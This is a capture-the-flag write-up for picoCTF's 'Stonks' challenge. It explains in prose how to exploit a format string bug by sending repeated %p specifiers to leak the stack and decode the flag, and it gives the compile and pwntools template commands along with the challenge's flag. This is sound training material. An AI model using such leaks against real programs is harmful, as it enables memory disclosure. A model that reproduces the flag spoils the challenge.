Problem

I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc mercury.picoctf.net 16439

• Program

• Source

Solution

1. We can compile the c source code using gcc -g -m32 vuln.c -o vuln and then we can generate a pwntools template using pwn template --host mercury.picoctf.net --port 16439 vuln.

2. This is a standard format string vulnerability. It even tells us that the program is vulnerable to a format string attack when we compile it.

3. Resources to learn about format string attacks: Syracuse University Lecture Notes / OWASP / LiveOverflow on YouTube / John Hammond PicoCTF 2017 'I've Got a Secret' on YouTube / PicoCTF 2018 'echooo' Writeup

4. However, my solution is based on this writeup.

5. Essentially, the solution script works by sending a string of repeating %p to the format string function in the program. The program replaces these %ps with values from the stack. Eventually, we work our way up the stack far enough to get to the api_buf and print that out in little endian hexadecimal. We can not use the looping '%{}$s'.format(i) trick from this PicoCTF 2018 'echooo' Writeup because the program is in little endian adn thus the flag would not be displayed correctly.

6. Once we dump the stack, we convert the hexadecimal into ascii by converting it to a byte array, reversing the array, and then filtering out bad ascii characters. Then, we simply print the flag.

Flag

picoCTF{I_l05t_4ll_my_m0n3y_c7cb6cae}